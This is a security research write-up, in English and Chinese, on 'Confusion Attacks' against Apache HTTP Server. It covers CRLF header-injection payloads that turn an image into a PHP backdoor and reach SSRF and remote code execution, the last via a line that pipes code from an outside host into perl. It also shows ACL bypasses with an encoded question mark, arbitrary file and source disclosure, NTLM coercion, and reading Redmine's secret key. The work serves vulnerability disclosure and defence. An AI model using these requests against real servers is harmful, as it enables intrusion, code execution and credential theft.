It’s also easy to transform an image with a legitimate extension into a PHP backdoor. For instance, this primitive allows specifying mod_php to execute embedded malicious code within the image, like:

http://server/cgi-bin/redir.cgi?r=http:// %0d%0a
Location:/uploads/avatar.webp %0d%0a
Content-Type:application/x-httpd-php %0d%0a
%0d%0a

✔️ 3-2-2. Arbitrary Handler to Full SSRF

Calling the mod_proxy to access any protocol on any URL is, of course, straightforward:

http://server/cgi-bin/redir.cgi?r=http:// %0d%0a
Location:/ooo %0d%0a
Content-Type:proxy:http://example.com/%3F %0d%0a
%0d%0a

Moreover, this is also a full-control SSRF where you can control all request headers and obtain all HTTP responses! A slight disappointment is when accessing Cloud Metadata, mod_proxy automatically adds an X-Forwarded-For header, which gets blocked by EC2 and GCP’s Metadata protection mechanisms, otherwise, this would be an even more powerful primitive.

✔️ 3-2-3. Arbitrary Handler to Access Local Unix Domain Socket

However, mod_proxy offers a more “convenient” feature — it can access local Unix Domain Sockets! 😉

Here’s a demonstration accessing PHP-FPM’s local Unix Domain Socket to execute a PHP backdoor located in /tmp/:

http://server/cgi-bin/redir.cgi?r=http:// %0d%0a
Location:/ooo %0d%0a
Content-Type:proxy:unix:/run/php/php-fpm.sock|fcgi://127.0.0.1/tmp/ooo.php %0d%0a
%0d%0a

Theoretically, this technique has even more potential, such as protocol smuggling (smuggling FastCGI in HTTP/HTTPS protocols 😏) or exploiting other vulnerable local sockets. These possibilities are left for interested readers to explore.

✔️ 3-2-4. Arbitrary Handler to RCE

Finally, let’s demonstrate how to transform this primitive into an RCE using a common CTF trick! Since the official PHP Docker image includes PEAR, a command-line PHP package management tool, using its Pearcmd.php as an entry point allows us to achieve further exploitation. You can check this article — Docker PHP LFI Summary, written by Phith0n for details!

Here we utilize a Command Injection within run-tests to complete the entire exploit chain, detailed as follows:

http://server/cgi-bin/redir.cgi?r=http:// %0d%0a
Location:/ooo? %2b run-tests %2b -ui %2b $(curl${IFS}orange.tw/x|perl) %2b alltests.php %0d%0a
Content-Type:proxy:unix:/run/php/php-fpm.sock|fcgi://127.0.0.1/usr/local/lib/php/pearcmd.php %0d%0a
%0d%0a

It’s common to see CRLF Injection or Header Injection being reported as XSS in Security Advisories or Bug Bounties. While it is true that these can sometimes chain to impactful vulnerabilities like Account Takeover through SSO, please don’t forget that they can also lead to Server-Side RCE, as this demonstration proves its potential!

🔥 4. Other Vulnerabilities

While this essentially covers the Confusion Attacks, some minor vulnerabilities discovered during our research of Apache HTTP Server are worth mentioning separately.

⚔️ CVE-2024-38472 - Windows UNC-based SSRF

Firstly, the Windows implementation of the apr_filepath_merge() function allows the use of UNC paths, which allows attackers to coerce NTLM authentication to any host. Here we list two different triggering paths:

✔️ Triggered via HTTP Request Parser

Direct triggering through an HTTP request parser in Httpd requires additional configuration, which might seem impractical at first glance but often appears with Tomcat (mod_jk, mod_proxy_ajp) or pairing with PATH_INFO:

AllowEncodedSlashes On

Additionally, since Httpd rewrote its core HTTP request parser logic after 2.4.49, triggering the vulnerability in versions above requires an additional configuration:

AllowEncodedSlashes On
MergeSlashes Off

By using two %5C can force Httpd to coerce NTLM authentication to an attacker-server, and practically, this SSRF can be converted into RCE through NTLM Relay!

$ curl http://server/%5C%5Cattacker-server/path/to

✔️ Triggered via Type-Map

In the Debian/Ubuntu distribution of Httpd, Type-Map is enabled by default:

AddHandler type-map var

By uploading a .var file to the server and setting the URI field to a UNC path, you can also force the server to coerce NTLM authentication to the attacker. This is also the second .var trick I proposed. 😉

⚔️ CVE-2024-39573 - SSRF via Full Control of RewriteRule Prefix

Lastly, when you have full control over the prefix of a RewriteRule substitution target in Server Config or VirtualHost is fully controllable, you can invoke mod_proxy and its sub-modules:

RewriteRule ^/broken(.*) $1

Using the following URL can delegate the request to mod_proxy for processing:

$ curl http://server/brokenproxy:unix:/run/[...]|http://path/to

But if administrators have tested the rule properly, they would realize that such rules are impractical. Thus, originally it was reported along with another vulnerability as an exploit chain, but this behavior was also treated as a security boundary fix by the security team. As the patches came out, other researchers applied the same behavior to Windows UNC and obtained another additional CVE.

Future Works

Finally, let’s talk about future works and areas for improvement in this research. Confusion Attacks are still a very promising attack surface, especially since my research focused mainly on just two fields. Unless the Apache HTTP Server undergoes architectural improvements or provides better development standards, I believe we’ll see more “confusions” in the future!

So, what other areas could be enhanced? In reality, different Httpd distributions have different configurations, so other Unix-Like systems such as the RHEL series, BSD family, and even applications that utilize Httpd might have more escapable RewriteRule, more powerful local gadgets, and unexpected symbolic jumps. These are all left for those interested to continue exploring.

Due to time constraints, I was unable to share more real-world cases found and exploited in actual websites, devices, or even open-source projects. However, you can probably imagine — the real world is still full of countless unexplored rules, bypassable authentications, and hidden CGIs waiting to be uncovered. How to hunt these techniques worldwide? That’s your mission!

Conclusion

Maintaining an open-source project is truly challenging, especially when trying to balance user convenience with the compatibility of older versions. A slight oversight can lead to the entire system being compromised, such as what happened with Httpd 2.4.49, where a minor change in path processing logic led to the disastrous CVE-2021-41773. The entire development process must be carefully built upon a pile of legacy code and technical debt. So, if any Apache HTTP Server developers are reading this: Thank you for your hard work and contributions!

[中文] Confusion Attacks: Exploiting Hidden Semantic Ambiguity in Apache HTTP Server!


Orange Tsai (@orange_8361)  |  繁體中文版本  |  English Version

嗨,這是我今年發表在 Black Hat USA 2024 上針對 Apache HTTP Server 的研究。 此外,這份研究也將在 HITCONOrangeCon 上發表,有興趣搶先了解可點此取得投影片:

Confusion Attacks: Exploiting Hidden Semantic Ambiguity in Apache HTTP Server!

另外也謝謝來自 Akamai 的友善聯繫! 此份研究發表後第一時間他們也發佈了緩解措施 (詳情可參考 Akamai 的部落格)。

TL;DR

這篇文章探索了 Apache HTTP Server 中存在的架構問題,介紹了數個 Httpd 的架構債,包含 3 種不同的 Confusion Attacks、9 個新漏洞、20 種利用手法以及超過 30 種案例分析。 包括但不限於:

  1. 怎麼使用一個 ? 繞過 Httpd 內建的存取控制以及認證。
  2. 不安全的 RewriteRule 怎麼跳脫 Web Root 並存取整個檔案系統。
  3. 如何利用一段從 1996 遺留至今的程式碼把一個 XSS 轉化成 RCE。

大綱

在故事之前

這裡純粹是一些個人的 Murmur,如果只對技術細節感興趣可以直接跳到 —— 故事是如何開始的?

身為一名研究員、最大的快樂應該就是當自己的作品被同行關注並理解。所以當完成一個作品並擁有豐碩的成果後,理所當然會想要讓它被世界看到 —— 這也是為什麼我會多次在 Black Hat USA 以及 DEFCON 上分享的緣故。 在讀這篇文章的你也許知道,我從 2022 後就拿不到一個合法的簽證進入美國 (在免簽計畫中的台灣,通常只需要線上申請,數分鐘到數小時內就能取得旅行授權),導致錯過 Black Hat USA 2022 的實體演講。甚至 2023 到秘魯還有復活節島獨旅也無法從美國轉機 :(

為了解決這個情況,我從今年一月就開始準備 B1/B2 簽證、撰寫各式文件、到大使館面試以及漫無止盡的等待,這不是一件好玩的事,但為了讓作品被看到,還是花了非常多的時間在為了簽證奔波,以及尋求各種可能,甚至到會議開始的前三個禮拜,還不清楚發表是否會被取消 (BH 一開始只接受現場演講,不過謝謝審稿委員對這份研究的認可最終還是能透過預錄的形式發表),所以你所看到的所有內容包含投影片、錄影以及部落格文字都是在短短數十天內完成的。 😖

我只是一個單純的研究員,自認問心無愧,對漏洞的態度也始終是 —— 漏洞就該讓它被廠商知道以及修復。 寫這些文字也不為了什麼,純粹紀錄下一些無奈的心情、今年所做過的努力,以及謝謝在這個過程中幫助過我的人,謝謝你們 :)

故事是如何開始的?

大概是在今年年初的時候,我開始思考下一個研究的目標,也許你知道我總是希望挑戰那些影響整個網際網路的大目標,所以開始尋找一些看似複雜的主題或有趣的開源專案,例如 Nginx、PHP、甚至開始看起 RFC 來強化自己對於協議實作細節的認知。

雖然大部分的嘗試都以失敗告終 (不過有些也許會變成下一篇部落格主題 😉),但在細細品嘗這些程式碼時,我回憶起了曾經在去年年中短暫看過 Apache HTTP Server 原始碼這件事! 儘管最終由於工作的時程規畫並無深入的閱讀程式碼,但在那時就已經從它的編碼風格上「聞」到了一些不太好的味道。

於是在今年決定繼續下去,把「為什麼聞起來怪怪的」這件事從原本只是一個說不出的「感覺」具象化,深入下去研究 Apache HTTP Server!

為什麼 Apache HTTP Server 聞起來臭臭的?

首先,Apache HTTP Server 是一個由「模組們」建構起來的世界,從它官方文件中也看到其對於自身模組化 (MPMs - Multi-Processing Modules) 的自豪:

Apache httpd has always accommodated a wide variety of environments through its modular design. […] Apache HTTP Server 2.0 extends this modular design to the most basic functions of a web server.

整個 Httpd 的服務需要由數百個小模組齊心合力,共同合作才能完成客戶端的 HTTP 請求,官方所列出的 136 個模組其中約有快一半是預設啟用或經常被使用的模組

而更令人驚訝的是,這麼多模組在處理客戶端 HTTP 請求的時候,彼此之間還要共同維護著一份非常巨大的 request_rec 結構。 這個結構包括了在處理 HTTP 時會用到的一切元素,詳細的定義可以從 include/httpd.h 中找到。 所有模組都依賴這個巨大的結構去同步、溝通,甚至交換資料。 這個內部結構會像是拋接球般在所有模組間傳遞來傳遞去,每個模組都可以根據自己的喜好去隨意修改這個結構上的任意值!

這樣子的合作方式從軟體工程的角度來說其實不是什麼新鮮事,個體只需專心把份內事完成,只要所有人都乖乖完成自己的工作,那客戶就可以正常享受 Httpd 所提供的服務。 這樣子的分工在數個模組內可能還沒什麼問題,但如果今天把規模放大到數百個模組間的協同合作 —— 它們真的有辦法好好合作嗎? 🤔

所以我們的出發點很簡單 —— 模組間其實並不完全了解彼此的實作細節,但卻又被要求要一起合作。 每個模組可能由不同的開發者實作,程式碼歷經多年的疊代、重整以及修改,它們真的還清楚自己在做什麼嗎? 就算對自己瞭若指掌,那對其它模組呢? 在缺乏一個好的開發標準或使用準則下,這中間必然會存在很多小縫隙是我們可以利用的!

關於這次的新攻擊面: Confusion Attacks

基於前面的思考,我們開始專注在研究這些模組間的「關係」以及「交互作用」。 如果有一個模組不小心修改到了它覺得不重要但對另一個模組至關重要的結構欄位,那可能就會影響該模組的判斷。 甚至更進一步,如果 Apache HTTP Server 對這些結構的定義不夠精確,導致不同模組對同一個欄位在理解上有著根本的不一致,這都可能產生安全上的風險!

從這個出發點我們發展出了三種不同的攻擊,由於這些攻擊或多或少都模組對於結構欄位的誤用有關,因此把這個攻擊面命名為「Confusion Attack」,而以下是我們所發展出的攻擊:

  1. Filename Confusion
  2. DocumentRoot Confusion
  3. Handler Confusion

從這些攻擊出發我們找到了 9 個不同的漏洞:

  1. CVE-2024-38472 - Apache HTTP Server on Windows UNC SSRF
  2. CVE-2024-39573 - Apache HTTP Server proxy encoding problem
  3. CVE-2024-38477 - Apache HTTP Server: Crash resulting in Denial of Service in mod_proxy via a malicious request
  4. CVE-2024-38476 - Apache HTTP Server may use exploitable/malicious backend application output to run local handlers via internal redirect
  5. CVE-2024-38475 - Apache HTTP Server weakness in mod_rewrite when first segment of substitution matches filesystem path
  6. CVE-2024-38474 - Apache HTTP Server weakness with encoded question marks in backreferences
  7. CVE-2024-38473 - Apache HTTP Server proxy encoding problem
  8. CVE-2023-38709 - Apache HTTP Server: HTTP response splitting
  9. CVE-2024-?????? - [redacted]

這些漏洞都透過官方的安全信箱回報,並由 Apache HTTP Server 團隊在 2024-07-01 發佈安全性通報以及 2.4.60 更新 (詳細可參考官方公告)。

由於這是一個針對 Httpd 架構以及其內部機制所帶來的新攻擊面,理所當然第一個參與的人可以找到最多漏洞,因此我也是目前擁有最多 Apache HTTP Server CVE 的人 😉,導致很多更新修復由於其歷史架構無法向下兼容。 所以對於很多運行許久的正式伺服器來說修復並不是一件容易的事,若網站管理員不經思考就直接更新反而會打破許多舊有的設定造成服務中斷。 😨

接下來就開始介紹這次發展出來的攻擊們吧!

🔥 1. Filename Confusion

首先,第一個是基於 Filename 欄位上的 Confusion,從字面上來看 r->filename 應該是一個檔案系統路徑,然而在 Httpd 中,有些模組會把它當成網址來處理。 如果在 HTTP 請求的上下文中,有些模組把 r->filename 當成檔案路徑,而其他模組將它當成網址,這其中的不一致就會造成安全上的問題!

⚔️ Primitive 1-1. Truncation

所以哪些模組會把 r->filename 當成網址呢? 首先是 mod_rewrite 允許網站管理員透過 RewriteRule 語法輕鬆的將路徑透過指定的規則改寫:

RewriteRule Pattern Substitution [flags]

其中目標可以是一個檔案系統路徑或是一個網址,我想這應該是一個為了使用者體驗所做出的方便,但同時這個「方便」也帶出了一些風險,例如在改寫路徑時,mod_rewrite 會強制把結果視為網址處理 (splitout_queryargs()),這導致了在 HTTP 請求中可以透過一個問號 %3F 去截斷 RewriteRule 後面的路徑或網址,並引出以下兩種攻擊手法。

Path: modules/mappers/mod_rewrite.c#L4141

/*
 * Apply a single RewriteRule
 */
static int apply_rewrite_rule(rewriterule_entry *p, rewrite_ctx *ctx)
{
    ap_regmatch_t regmatch[AP_MAX_REG_MATCH];
    apr_array_header_t *rewriteconds;
    rewritecond_entry *conds;
    
    // [...]
    
    for (i = 0; i < rewriteconds->nelts; ++i) {
        rewritecond_entry *c = &conds[i];
        rc = apply_rewrite_cond(c, ctx);
        
        // [...] do the remaining stuff
        
    }
    
    /* Now adjust API's knowledge about r->filename and r->args */
    r->filename = newuri;

    if (ctx->perdir && (p->flags & RULEFLAG_DISCARDPATHINFO)) {
        r->path_info = NULL;
    }

    splitout_queryargs(r, p->flags);         // <------- [!!!] Truncate the `r->filename`
    
    // [...]
}
✔️ 1-1-1. Path Truncation

首先,第一個攻擊手法是檔案系統路徑上的截斷,想像下面這個 RewriteRule

RewriteEngine On
RewriteRule "^/user/(.+)$" "/var/user/$1/profile.yml"

伺服器會根據網址路徑 /user/ 後的使用者名稱開啟相對應的個人設定檔案,例如:

$ curl http://server/user/orange
 # the output of file `/var/user/orange/profile.yml`

由於 mod_rewrite 會強制將重寫後的結果當成一個網址處理,因此雖然目標是一個檔案系統路徑,但卻可以透過一個問號去截斷後方的 /profile.yml 例如:

$ curl http://server/user/orange%2Fsecret.yml%3F
 # the output of file `/var/user/orange/secret.yml`

這是我們的第一個攻擊手法 —— 路徑截斷。 對於這個攻擊手法的探索先稍稍停留在這邊,雖然目前看起來還只是一個小瑕疵,但請先記好它,因為這會在之後的攻擊中一再的出現,慢慢把這個看似無用的小破口撕裂開來! 😜

✔️ 1-1-2. Mislead RewriteFlag Assignment

截斷手法的第二個利用是誤導 RewriteFlag 的設置,想像網站管理員透過下列的 RewriteRule 去管理網站中路徑以及相對應模組:

RewriteEngine On
RewriteRule  ^(.+\.php)$  $1  [H=application/x-httpd-php]

如果請求附檔名是 .php 結尾則加上 mod_php 相對應的處理器 (此外也可以是環境變數或是 Content-Type,關於標誌的詳細設定可參考官方的手冊 RewriteRule Flags)。

由於 mod_rewrite 的截斷行為發生在正規表達式匹配後,因此惡意的攻擊者可以利用原本的規則,透過 ?RewriteFlag 設定到不屬於它們的請求上。 例如上傳一個夾帶惡意 PHP 程式碼的 GIF 圖片並透過惡意請求將圖片當成後門執行:

$ curl http://server/upload/1.gif
 # GIF89a <?=`id`;>

$ curl http://server/upload/1.gif%3fooo.php
 # GIF89a uid=33(www-data) gid=33(www-data) groups=33(www-data)

⚔️ Primitive 1-2. ACL Bypass

Filename Confusion 的第二個攻擊手法發生在 mod_proxy 身上,相較前一個攻擊是無條件將目標當成網址處理,這次則是因為模組間對 r->filename 的理解不一致所導致的認證及存取控制繞過

mod_proxy 會將 r->filename 當成網址這件事情其實很合理,因為原本 Proxy 的目的就是將請求「導向」到其它網址上,但安全往往就是單獨拿出來看沒問題,搭配在一起就出問題了! 特別是當大多數模組預設將 r->filename 視為檔案系統路徑時,試想一下假設今天你使用基於檔案系統的存取控制模組,而現在 mod_proxy 又會把 r->filename 當成網址,這其中的不一致就可以導致存取控制或是認證被繞過!

一個經典的例子是,網站管理員透過 Files 語法去對單一檔案加上限制,例如 admin.php

<Files "admin.php">
    AuthType Basic 
    AuthName "Admin Panel"
    AuthUserFile "/etc/apache2/.htpasswd"
    Require valid-user
</Files>

在預設安裝的 PHP-FPM 環境中,這種設定可以被直接繞過! 順道一提這也是 Apache HTTP Server 中最常見到的認證方式! 假設今天你瀏覽了這樣的網址:

http://server/admin.php%3Fooo.php

首先在這個網址的 HTTP 生命週期中,認證模組會將請求的檔案名稱與被保護的檔案進行比對,此時 r->filename 欄位是 admin.php?ooo.php 理所當然與 admin.php 不符合,於是模組會認為當前請求不需要認證。 然而 PHP-FPM 的設定檔案又設定當收到結尾為 .php 的請求時透過 SetHandler 語法將請求轉交給 mod_proxy

Path: /etc/apache2/mods-enabled/php8.2-fpm.conf

# Using (?:pattern) instead of (pattern) is a small optimization that
# avoid capturing the matching pattern (as $1) which isn't used here
<FilesMatch ".+\.ph(?:ar|p|tml)$">
    SetHandler "proxy:unix:/run/php/php8.2-fpm.sock|fcgi://localhost"
</FilesMatch>

mod_proxy 會將 r->filename 重寫成以下網址並根據其中的協議呼叫子模組 mod_proxy_fcgi 處理後續 FastCGI 協議的邏輯:

proxy:fcgi://127.0.0.1:9000/var/www/html/admin.php?ooo.php

由於這時後端在收到檔案名稱時已經是一個奇怪的格式了,PHP-FPM 只好對這個行為做特別處理,其中處理的邏輯如下:

Path: sapi/fpm/fpm/fpm_main.c#L1044

#define APACHE_PROXY_FCGI_PREFIX "proxy:fcgi://"
#define APACHE_PROXY_BALANCER_PREFIX "proxy:balancer://"

if (env_script_filename &&
    strncasecmp(env_script_filename, APACHE_PROXY_FCGI_PREFIX, sizeof(APACHE_PROXY_FCGI_PREFIX) - 1) == 0) {
    /* advance to first character of hostname */
    char *p = env_script_filename + (sizeof(APACHE_PROXY_FCGI_PREFIX) - 1);
    while (*p != '\0' && *p != '/') {
        p++;    /* move past hostname and port */
    }
    if (*p != '\0') {
        /* Copy path portion in place to avoid memory leak.  Note
         * that this also affects what script_path_translated points
         * to. */
        memmove(env_script_filename, p, strlen(p) + 1);
        apache_was_here = 1;
    }
    /* ignore query string if sent by Apache (RewriteRule) */
    p = strchr(env_script_filename, '?');
    if (p) {
        *p =0;
    }
}

可以看到 PHP-FPM 先對檔案名稱正規化並對其中的問號 ? 進行分隔取出其中實際的檔案路徑並執行 (也就是 /var/www/html/admin.php)。 所以基本上所有使用 Files 語法針對單一 PHP 檔案的認證或是存取控制設定在運行 PHP-FPM 的情境下都存在風險! 😮

從 GitHub 上可以找到非常多潛在有風險的設定,例如被限制在只有內網才能存取的 phpinfo()

# protect phpinfo, only allow localhost and local network access
<Files php-info.php>
    # LOCAL ACCESS ONLY
    # Require local 

    # LOCAL AND LAN ACCESS
    Require ip 10 172 192.168
</Files>

使用 .htaccess 阻擋起來的 Adminer:

<Files adminer.php>
    Order Allow,Deny
    Deny from all
</Files>

被保護起來的 xmlrpc.php

<Files xmlrpc.php>
    Order Allow,Deny
    Deny from all
</Files>

防止直接存取的命令行工具:

<Files "cron.php">
    Deny from all
</Files>

透過認證模組以及 mod_proxy 間對 r->filename 欄位理解的不一致,上面所有的例子都可以透過一個 ? 成功繞過!

🔥 2. DocumentRoot Confusion

接下來要介紹的攻擊是基於 DocumentRoot 上的 Confusion Attack! 首先你可以思考一下,對於下面這樣子的 Httpd 設定:

DocumentRoot /var/www/html
RewriteRule  ^/html/(.*)$   /$1.html

當瀏覽 http://server/html/about 時,到底實際 Httpd 會開啟哪個檔案? 是根目錄下的 /about.html 還是 DocumentRoot 下的 /var/www/html/about.html 呢?

答案是 —— 兩個路徑都會存取。 這也是我們的第二個 Confusion Attack,對於任意[1]RewriteRule,Httpd 總是會嘗試開啟帶有 DocumentRoot 的路徑以及沒有的路徑! 有趣吧 😉

[1] 位於 Server ConfigVirtualHost Block

Path: modules/mappers/mod_rewrite.c#L4939

    if(!(conf->options & OPTION_LEGACY_PREFIX_DOCROOT)) {
        uri_reduced = apr_table_get(r->notes, "mod_rewrite_uri_reduced");
    }

    if (!prefix_stat(r->filename, r->pool) || uri_reduced != NULL) {     // <------ [1] access without root
        int res;
        char *tmp = r->uri;

        r->uri = r->filename;
        res = ap_core_translate(r);             // <------ [2] access with root
        r->uri = tmp;

        if (res != OK) {
            rewritelog((r, 1, NULL, "prefixing with document_root of %s"
                        " FAILED", r->filename));

            return res;
        }

        rewritelog((r, 2, NULL, "prefixed with document_root to %s",
                    r->filename));
    }

    rewritelog((r, 1, NULL, "go-ahead with %s [OK]", r->filename));
    return OK;
}

當然絕大部分的情況是目標檔案不存在,於是 Httpd 會存取帶有 DocumentRoot 的版本,但這個行為已經讓我們能夠「故意的」去存取 Web Root 以外的路徑,如果今天可以控制 RewriteRule 的目標前綴那我們是不是就能瀏覽作業系統上的任意檔案了? 這也是我們第二個 Confusion Attack 的精神! 從 GitHub 中可以找到千千萬萬個有問題的寫法,有趣的是甚至連官方的範例文件都是易遭受攻擊的:

# Remove mykey=???
RewriteCond "%{QUERY_STRING}" "(.*(?:^|&))mykey=([^&]*)&?(.*)&?$"
RewriteRule "(.*)" "$1?%1%3"

除此之外還有其它亦受影響的 RewriteRule 例如基於快取需求或是將想副檔名隱藏起來的 URL Masking 規則:

RewriteRule  "^/html/(.*)$"  "/$1.html"

或是想節省流量,嘗試使用壓縮版本的靜態檔案規則:

RewriteRule  "^(.*)\.(css|js|ico|svg)" "$1\.$2.gz"

將老舊的網站轉址到根目錄的規則:

RewriteRule  "^/oldwebsite/(.*)$"  "/$1"

對所有 CORS 的預檢請求都回傳 200 OK 的規則:

RewriteCond %{REQUEST_METHOD} OPTIONS
RewriteRule ^(.*)$ $1 [R=200,L]

理論上只要 RewriteRule 的目標前綴可控,我們可以瀏覽幾乎整個檔案系統,但從前面的規則中發現還有一個限制我們必須跨過的,前面例子中所出現的副檔名如 .html 以及 .gz 的後綴都是讓我們沒那麼地自由的一個限制 —— 所以可以繞過這個限制嗎? 不知道有沒有人想起前面在 Filename Confusion 章節所介紹的路徑截斷,透過這兩個攻擊的結合,我們可以自由的瀏覽作業系統上的任意檔案!

接下來的範例都基於這個不安全的 RewriteRule 來做示範:

RewriteEngine On
RewriteRule  "^/html/(.*)$"  "/$1.html"

⚔️ Primitive 2-1. Server-Side Source Code Disclosure

首先來介紹 DocumentRoot Confusion 的第一個攻擊手法 —— 任意伺服器端程式碼洩漏

由於 Httpd 會根據當前目錄或是當前虛擬主機設定決定是否當成 Server-Side Script 處理,因此透過絕對路徑去存取目標程式碼可以混淆 Httpd 的邏輯導致洩漏原本該被當成程式碼執行的檔案內容。

✔️ 2-1-1. Disclose CGI Source Code

首先是洩漏伺服器端的 CGI 程式碼,由於 mod_cgi 是透過 ScriptAlias 將 CGI 目錄與所指定的 URL 前綴綁定起來,當使用絕對路徑直接瀏覽 CGI 時由於 URL 前綴變了,因此可以直接洩漏出檔案原始碼。

$ curl http://server/cgi-bin/download.cgi
 # the processed result from download.cgi
$ curl http://server/html/usr/lib/cgi-bin/download.cgi%3F
 # #!/usr/bin/perl
 # use CGI;
 # ...
 # # the source code of download.cgi
✔️ 2-1-2. Disclose PHP Source Code

接著是洩漏伺服器端的 PHP 程式碼,由於 PHP 的使用場景眾多,若只針對特定目錄或是虛擬主機套用 PHP 環境的話 (常見於網站代管服務),可以透過未啟用 PHP 的虛擬主機存取 PHP 檔案以洩漏原始碼!

例如 www.local 以及 static.local 兩個虛擬主機都託管在同一台伺服器上,www.local 允許運行 PHP 而 static.local 則純粹負責處理靜態檔案,因此可以透過下面的方式洩漏出 config.php 內的敏感資訊:

$ curl http://www.local/config.php
 # the processed result (empty) from config.php
$ curl http://www.local/var/www.local/config.php%3F -H "Host: static.local"
 # the source code of config.php

⚔️ Primitive 2-2. Local Gadgets Manipulation!

接下來是我們的第二個攻擊手法 —— Local Gadgets Manipulation

首先,在前面介紹到「瀏覽作業系統上的任意檔案」時不知道你有沒有好奇: 「欸那是不是一個不安全的 RewriteRule 就可以存取到 /etc/passwd?」 對的 —— 但也不完全對。 蛤?

技術上來說確實伺服器會去檢查 /etc/passwd 是否存在,但 Apach HTTP Server 內建的存取控制阻擋了我們的存取,這裡是 Apache HTTP Server 的設定檔模板內容

<Directory />
    AllowOverride None
    Require all denied
</Directory>

會觀察到預設阻擋了根目錄 / 的瀏覽 (Require all denied),然而實際上這就沒戲了嗎? 實際上再詳細追查各個 Httpd 的發行版會發現 Debian/Ubuntu 作業系統預設允許了 /usr/share

<Directory /usr/share>
    AllowOverride None
    Require all granted
</Directory>

所以我們的「任意檔案存取」似乎有點那麼地不任意。 不過我們打破原本只能瀏覽 DocumentRoot 的信任算是跨出很大的一步了。 接下來要做的事情就是「壓榨」這個目錄內的各種可能。 所有可利用的資源、目錄中現有的教學範例、說明文件、單元測試檔案,甚至伺服器上程式語言如 PHP、Python 甚至 PHP 的模組都有機會成為我們濫用的對象!

P.S. 當然上面只是基於 Ubuntu/Debian 作業系統發行的 Httpd 版本設定做解釋,實務上也有發現一些應用軟體直接把的根目錄的 Require all denied 移除導致可以直接存取 /etc/passwd

✔️ 2-2-1. Local Gadget to Information Disclosure

首先來尋找看看這個目錄下是否存在這一些檔案是可以利用的。 首先是目標 Apache HTTP Server 如果安裝 websocketd 這個服務的話,服務套件預設會在 /usr/share/doc/websocketd/examples/php/ 下放置一個範例 PHP 程式碼 dump-env.php,如果目標伺服器上存在 PHP 環境的話可以直接存取這個範例程式去洩漏敏感的環境變數。

另外如果目標同時安裝如 Nginx 或是 Jetty 的話,雖然 /usr/share 理論上該是套件安裝時所存放的唯讀複本,但這些服務的預設 Web Root 就在 /usr/share 下,因此也能透過這個攻擊手法去洩漏這些網頁應用的敏感資訊,例如 Jetty 上的 web.xml 設定等等:

  • /usr/share/nginx/html/
  • /usr/share/jetty9/etc/
  • /usr/share/jetty9/webapps/

這裡簡單展示一個透過存取 Davical 套件所存在的 setup.php 唯讀複本去洩漏 phpinfo() 內容。

✔️ 2-2-2. Local Gadget to XSS

接著如何把這個攻擊手法轉化成 XSS 呢? 在 Ubuntu Desktop 環境中預設會安裝 LibreOffice 這套開源的辦公室應用,利用其中幫助文件的語言切換功能來完成 XSS。

Path: /usr/share/libreoffice/help/help.html

    var url = window.location.href;
    var n = url.indexOf('?');
    if (n != -1) {
        // the URL came from LibreOffice help (F1)
        var version = getParameterByName("Version", url);
        var query = url.substr(n + 1, url.length);
        var newURL = version + '/index.html?' + query;
        window.location.replace(newURL);
    } else {
        window.location.replace('latest/index.html');
    }

因此就算目標沒有部署任何網頁應用,我們也可以利用一個不安全的 RewriteRule 透過作業系統自帶的檔案來創造出 XSS。

✔️ 2-2-3. Local Gadget to LFI

至於任意檔案讀取呢? 如果目標伺服器上安裝了一些 PHP 甚至前端應用套件,例如 JpGraph、jQuery-jFeed 甚至 WordPress 或 Moodle 外掛,那麼它們自帶的使用教學或是除錯用程式碼都可以變成利用的對象,例如:

  • /usr/share/doc/libphp-jpgraph-examples/examples/show-source.php
  • /usr/share/javascript/jquery-jfeed/proxy.php
  • /usr/share/moodle/mod/assignment/type/wims/getcsv.php

這裡展示利用 jQuery-jFeed 所自帶的 proxy.php 來讀取 /etc/passwd

✔️ 2-2-4. Local Gadget to SSRF

當然找到一個 SSRF 也不在話下,例如 MagpieRSS 提供了一個 magpie_debug.php 檔案就是一個絕佳的小工具:

  • /usr/share/php/magpierss/scripts/magpie_debug.php
✔️ 2-2-5. Local Gadget to RCE

所以能 RCE 嗎? 別急我們先慢慢來! 首先這個攻擊手法已經可以把既有的攻擊面全部重新套用一次了,例如在某次開發過程中不小心被遺留下來 (甚至可能還是被第三方套件所依賴的) 的舊版本 PHPUnit,可以直接使用 CVE-2017-9841 來執行任意程式碼,又或者是安裝完 phpLiteAdmin (由於是唯讀副本所以預設密碼是 admin),相信看到這邊會發現 Local Gadgets Manipulation 這個攻擊手法存在著無窮潛力,剩下只是發掘出更厲害以及更通用的小工具!

⚔️ Primitive 2-3. Jailbreak from Local Gadgets

看到這裡你可能會好奇: 「真的不能跳出 /usr/share 嗎?」 當然可以,這也是要介紹的第三個攻擊手法 —— /usr/share 中越獄!

Debian/Ubuntu 的 Httpd 發行版中預設開啟了 FollowSymLinks 選項,就算非 Debian/Ubuntu 發行版但 Apache HTTP Server 也隱含地預設允許符號連結

<Directory />
    Options FollowSymLinks
    AllowOverride None
    Require all denied
</Directory>
✔️ 2-3-1. Jailbreak from Local Gadgets

因此只要有套件在它的安裝目錄下符號連結到 /usr/share 外,這個符號連結就成為一個跳板去存取更多的小工具完成更多的利用。 這裡列出一些我們已經發現可利用的符號連結:

  • Cacti Log: /usr/share/cacti/site/ -> /var/log/cacti/
  • Solr Data: /usr/share/solr/data/ -> /var/lib/solr/data
  • Solr Config: /usr/share/solr/conf/ -> /etc/solr/conf/
  • MediaWiki Config: /usr/share/mediawiki/config/ -> /var/lib/mediawiki/config/
  • SimpleSAMLphp Config: /usr/share/simplesamlphp/config/ -> /etc/simplesamlphp/
✔️ 2-3-2. Jailbreak Local Gadgets to Redmine RCE

越獄攻擊手法的最後讓我們展示一個利用 Redmine 的雙層符號連結跳躍去完成 RCE 的例子。 在預設安裝的 Redmine 程式碼目錄中有個 instances/ 目錄指向 /var/lib/redmine/,而位於 /var/lib/redmine/ 下的 default/config/ 目錄又指向 /etc/redmine/default/ 資料夾,裡面存放著 Redmine 的資料庫設定以及應用程式私密金鑰。

$ file /usr/share/redmine/instances/
 symbolic link to /var/lib/redmine/
$ file /var/lib/redmine/config/
 symbolic link to /etc/redmine/default/
$ ls /etc/redmine/default/
 database.yml    secret_key.txt

於是透過一個不安全的 RewriteRule 以及兩層符號連結,我們能夠輕鬆存取到 Redmine 所使用的應用程式金鑰:

$ curl http://server/html/usr/share/redmine/instances/default/config/secret_key.txt%3f
 HTTP/1.1 200 OK
 Server: Apache/2.4.59 (Ubuntu) 
 ...
 6d222c3c3a1881c865428edb79a74405

